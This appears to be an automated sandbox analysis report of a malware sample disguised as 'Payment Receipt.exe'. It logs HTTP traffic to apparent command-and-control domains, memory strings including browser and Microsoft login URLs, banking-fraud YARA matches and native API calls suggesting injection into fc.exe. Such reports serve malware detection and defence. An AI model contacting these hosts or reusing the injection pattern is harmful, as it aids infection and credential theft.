                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 03 Jan 2025 10:40:45 GMT
                Server: Apache
                Content-Length: 774
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 03 Jan 2025 10:40:48 GMT
                Server: Apache
                Content-Length: 774
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Jan 2025 18:40:17 GMT
                Content-Type: text/html
                Content-Length: 166
                Connection: close
                Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Jan 2025 18:40:20 GMT
                Content-Type: text/html
                Content-Length: 166
                Connection: close
                Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Jan 2025 18:40:23 GMT
                Content-Type: text/html
                Content-Length: 166
                Connection: close
                Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 02 Jan 2025 18:40:25 GMT
                Content-Type: text/html
                Content-Length: 0
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Length: 146
                Content-Type: text/html
                Date: Fri, 03 Jan 2025 10:41:21 GMT
                Server: nginx
                X-Cache: BYPASS
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Length: 146
                Content-Type: text/html
                Date: Fri, 03 Jan 2025 10:41:23 GMT
                Server: nginx
                X-Cache: BYPASS
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Length: 146
                Content-Type: text/html
                Date: Fri, 03 Jan 2025 10:41:26 GMT
                Server: nginx
                X-Cache: BYPASS
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Length: 146
                Content-Type: text/html
                Date: Fri, 03 Jan 2025 10:41:28 GMT
                Server: nginx
                X-Cache: BYPASS
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:41:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 03 Jan 2025 10:41:48 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OnjKP%2BcKgpmu%2BWe6kBGu0DkTBV0kGn9azM9D6sXqpSa%2FZTAotsCqZPkKOUobqKdhRlJ0ARFHphtAEMwd9WegtKRaczZKK2oYQLYZB657nG0GkpxdIWOTxvaSUZLQM30Kx0IA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc260e8cef54283-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:41:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 03 Jan 2025 10:41:51 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HpNq%2FzbsKZ3hZXCJ228v8boqupopXqT1vl7Vvr8Xy5%2BMuSf%2FSqr%2BviKX3jBYkHRLajwvMAZorQzwrNfCW06Rvu7fwwIElNqmrjjKmtJizQrA9l%2FvsqmuHgjObGiAydyqnal"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc260f8bc7d8c0b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1841&rtt_var=920&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:41:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 03 Jan 2025 10:41:54 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajwElZ2UJYR8oEHAPmNGYNSpoGK6vM4J9J2kpNhYRTDIf0NGakl%2Fq44PboPsS9rgO0vxUaeyWSK07vJreOiOGkWNaWCDtuQVh4eCBdVh9N2UMcbcHCjZ0zNAn8R5PNSt2A2V"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc26108ba0a4364-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=7&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10833&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38 Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
              Source: fc.exe, 00000005.00000002.4098630415.00000000047E6000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.0000000003E86000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i
              Source: fc.exe, 00000005.00000002.4098630415.00000000047E6000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.0000000003E86000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://cifasnc.info/xmlrpc.php
              Source: MEREhDqMRRNSzT.exe, 00000006.00000002.4099825496.000000000511C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.moyu19.pro
              Source: MEREhDqMRRNSzT.exe, 00000006.00000002.4099825496.000000000511C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.moyu19.pro/b9e2/
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fc.exe, 00000005.00000002.4098630415.000000000400C000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.00000000036AC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10339
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000005.00000003.2192052274.00000000079BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: fc.exe, 00000005.00000002.4098630415.0000000004B0A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000005.00000002.4100552512.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.00000000041AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
              Source: fc.exe, 00000005.00000002.4098630415.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.000000000433C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThM

              E-Banking Fraud

              Source: Yara match | File source: 0.2.Payment Receipt.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: initial sample | Static PE information: Filename: Payment Receipt.exe
              Source: Payment Receipt.exe | Static file information: Suspicious name
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_0075CB43 NtClose,0_2_0075CB43
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2B60 NtClose,LdrInitializeThunk,0_2_015E2B60
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_015E2DF0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_015E2C70
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E35C0 NtCreateMutant,LdrInitializeThunk,0_2_015E35C0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E4340 NtSetContextThread,0_2_015E4340
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E4650 NtSuspendThread,0_2_015E4650
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2BF0 NtAllocateVirtualMemory,0_2_015E2BF0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2BE0 NtQueryValueKey,0_2_015E2BE0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2B80 NtQueryInformationFile,0_2_015E2B80
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2BA0 NtEnumerateValueKey,0_2_015E2BA0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2AD0 NtReadFile,0_2_015E2AD0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2AF0 NtWriteFile,0_2_015E2AF0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2AB0 NtWaitForSingleObject,0_2_015E2AB0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2D10 NtMapViewOfSection,0_2_015E2D10
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2D00 NtSetInformationFile,0_2_015E2D00
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2D30 NtUnmapViewOfSection,0_2_015E2D30
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2DD0 NtDelayExecution,0_2_015E2DD0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2DB0 NtEnumerateKey,0_2_015E2DB0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2C60 NtCreateKey,0_2_015E2C60
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2C00 NtQueryInformationProcess,0_2_015E2C00
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2CC0 NtQueryVirtualMemory,0_2_015E2CC0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2CF0 NtOpenProcess,0_2_015E2CF0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2CA0 NtQueryInformationToken,0_2_015E2CA0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2F60 NtCreateProcessEx,0_2_015E2F60
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2F30 NtCreateSection,0_2_015E2F30
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2FE0 NtCreateFile,0_2_015E2FE0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2F90 NtProtectVirtualMemory,0_2_015E2F90
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2FB0 NtResumeThread,0_2_015E2FB0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2FA0 NtQuerySection,0_2_015E2FA0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2E30 NtWriteVirtualMemory,0_2_015E2E30
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2EE0 NtQueueApcThread,0_2_015E2EE0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2E80 NtReadVirtualMemory,0_2_015E2E80
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E2EA0 NtAdjustPrivilegesToken,0_2_015E2EA0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E3010 NtOpenDirectoryObject,0_2_015E3010
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E3090 NtSetValueKey,0_2_015E3090
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E39B0 NtGetContextThread,0_2_015E39B0
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E3D70 NtOpenThread,0_2_015E3D70
              Source: C:\Users\user\Desktop\Payment Receipt.exe | Code function: 0_2_015E3D10 NtOpenProcessToken,0_2_015E3D10
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03024340 NtSetContextThread,LdrInitializeThunk,5_2_03024340
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03024650 NtSuspendThread,LdrInitializeThunk,5_2_03024650
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022B60 NtClose,LdrInitializeThunk,5_2_03022B60
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03022BA0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03022BE0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03022BF0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022AD0 NtReadFile,LdrInitializeThunk,5_2_03022AD0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022AF0 NtWriteFile,LdrInitializeThunk,5_2_03022AF0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022F30 NtCreateSection,LdrInitializeThunk,5_2_03022F30
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022FB0 NtResumeThread,LdrInitializeThunk,5_2_03022FB0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022FE0 NtCreateFile,LdrInitializeThunk,5_2_03022FE0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03022E80
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03022EE0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03022D10
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03022D30
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022DD0 NtDelayExecution,LdrInitializeThunk,5_2_03022DD0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03022DF0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022C60 NtCreateKey,LdrInitializeThunk,5_2_03022C60
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03022C70
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03022CA0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_030235C0 NtCreateMutant,LdrInitializeThunk,5_2_030235C0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_030239B0 NtGetContextThread,LdrInitializeThunk,5_2_030239B0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022B80 NtQueryInformationFile,5_2_03022B80
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022AB0 NtWaitForSingleObject,5_2_03022AB0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022F60 NtCreateProcessEx,5_2_03022F60
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022F90 NtProtectVirtualMemory,5_2_03022F90
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022FA0 NtQuerySection,5_2_03022FA0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022E30 NtWriteVirtualMemory,5_2_03022E30
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022EA0 NtAdjustPrivilegesToken,5_2_03022EA0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022D00 NtSetInformationFile,5_2_03022D00
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022DB0 NtEnumerateKey,5_2_03022DB0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022C00 NtQueryInformationProcess,5_2_03022C00
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022CC0 NtQueryVirtualMemory,5_2_03022CC0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03022CF0 NtOpenProcess,5_2_03022CF0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03023010 NtOpenDirectoryObject,5_2_03023010
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03023090 NtSetValueKey,5_2_03023090
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03023D10 NtOpenProcessToken,5_2_03023D10
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_03023D70 NtOpenThread,5_2_03023D70
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_008293B0 NtCreateFile,5_2_008293B0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_00829520 NtReadFile,5_2_00829520
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_008296B0 NtClose,5_2_008296B0
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_00829610 NtDeleteFile,5_2_00829610
              Source: C:\Windows\SysWOW64\fc.exe | Code function: 5_2_00829820 NtAllocateVirtualMemory,5_2_00829820
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01661D5A0_2_01661D5A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CFDC00_2_015CFDC0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01629C320_2_01629C32
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166FCF20_2_0166FCF2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166FF090_2_0166FF09
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01573FD50_2_01573FD5
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01573FD20_2_01573FD2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B1F920_2_015B1F92
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166FFB10_2_0166FFB1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B9EB00_2_015B9EB0
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D4234_2_0322D423
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_03237A364_2_03237A36
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322F27C4_2_0322F27C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0324E0CC4_2_0324E0CC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_032235E34_2_032235E3
